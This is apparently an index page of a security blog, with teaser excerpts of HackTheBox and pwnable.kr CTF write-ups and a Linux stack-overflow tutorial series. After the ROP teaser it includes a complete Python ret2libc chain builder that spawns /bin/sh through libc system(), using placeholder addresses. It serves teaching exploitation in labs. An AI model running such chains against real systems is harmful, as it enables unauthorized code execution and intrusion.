Booj thoughts on security

HackTheBox - Mantis

This writeup details attacking the Mantis machine from HackTheBox. In short, this machine looked indomitable at the start with its ridiculous list of open ports. Targeted enumeration, however, reveals that it's not as bad as first expected. Chapters: Enumeration MS-SQL Credentials MS14-068 Topics: MS-SQL Enumera...

HackTheBox - Shrek

This post will describe exploitation of the Shrek device on HackTheBox. Shrek, also known as steganography hell, or 'How the hell was anyone supposed to know to do that 7ckm3?'. It's very much the resident CTF box, so techniques like steganography are more common than service mis-configurations. Also to be expected is a lot of trolling. In...

Stack Buffer Overflows: Linux 3 - Bypassing DEP with ROP

In this chapter we'll be dealing with systems with ASLR disabled, and with all binary protections disabled bar NX. Here you'll learn how to craft basic ROP chains using functions in libc, and how to chain multiples of these together. Prior Reading: Chapter 1, Chapter 2. Environment: Ubuntu 16.04 32-bit, GDB Peda. The code we'll be us...
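The chaining the chapter teaser describes (one libc call after another on x86-32, with a pop;ret gadget to discard each call's arguments before returning into the next one) is shown below as an added example. This is not code from the post or the series; every address is a constructed placeholder standing in for values you would read out of gdb, readelf or a gadget finder on the no-ASLR target the series assumes, and the saved-EIP offset is likewise assumed.

```python
import struct

# Constructed placeholder addresses (assumptions, not real values). On a
# no-ASLR 32-bit target these would be fixed and read from gdb / readelf /
# a gadget finder before building the chain.
SYSTEM_ADDR = 0xf7e3e060  # libc system()
EXIT_ADDR   = 0xf7e31fb0  # libc exit()
BINSH_ADDR  = 0xf7f5f5e8  # "/bin/sh\0" string inside libc
POP_RET     = 0x080483c9  # gadget: pop ebx ; ret  (discards one dword)
JUNK_RET    = 0x41414141  # placeholder return address for the final call


def p32(value):
    """Pack a 32-bit little-endian dword, as it is laid out on the x86 stack."""
    return struct.pack("<I", value & 0xffffffff)


def build_chain(calls, pop_gadgets):
    """Build an x86-32 ret2libc chain calling each (func, [args]) in order.

    Stack layout per call, as seen when execution 'returns' into func:
        [func][return address][arg0][arg1]...
    For every call except the last, the return address must be a gadget that
    pops as many dwords as there are args and then rets, so the next func
    address is reached with the arguments cleaned off the stack.
    pop_gadgets maps argument count -> address of a matching pop...;ret gadget.
    A zero-argument call needs no gadget: the next func can be its return address.
    """
    chain = b""
    for index, (func, args) in enumerate(calls):
        is_last = index == len(calls) - 1
        chain += p32(func)
        if is_last:
            chain += p32(JUNK_RET)            # never used if func (e.g. exit) does not return
        elif args:
            chain += p32(pop_gadgets[len(args)])
        for arg in args:
            chain += p32(arg)
    return chain


def make_payload(saved_eip_offset, calls=None, pop_gadgets=None):
    """Padding up to the saved return address, then the chain.

    saved_eip_offset is assumed to have been found beforehand (e.g. with a
    cyclic pattern in GDB Peda). Default chain: system("/bin/sh") then exit(0).
    """
    if calls is None:
        calls = [(SYSTEM_ADDR, [BINSH_ADDR]), (EXIT_ADDR, [0])]
    if pop_gadgets is None:
        pop_gadgets = {1: POP_RET}
    return b"A" * saved_eip_offset + build_chain(calls, pop_gadgets)


def describe_chain(chain):
    """Return the chain as a list of hex dwords, handy for checking the layout."""
    return ["0x%08x" % struct.unpack("<I", chain[i:i + 4])[0]
            for i in range(0, len(chain), 4)]


if __name__ == "__main__":
    payload = make_payload(76)  # 76 is an assumed offset, not from the post
    for dword in describe_chain(payload[76:]):
        print(dword)
```

Feeding the payload to the target is deliberately left out, since that depends on how the vulnerable program reads input; the point is the dword layout, which you can compare against what GDB Peda shows on the stack at the crash.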

pwnable.kr - random, coin1 & bof

This post describes three Toddler's Bottle exploits on pwnable.kr. Random This is a simple binary exploitation challenge. The code for the binary is included once the user has SSH'd in: #include <stdio.h> int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key ^ rando...

HackTheBox - SolidState

This post will describe exploitation of the Solidstate device on HackTheBox. Solidstate's an interesting box, and also memorable as the day when the HTB platform shit itself from the load. It's also a lesson in reading the damn exploit code. I spent a long time re-running the exploit expecting stuff to happen, but the true realisation came ...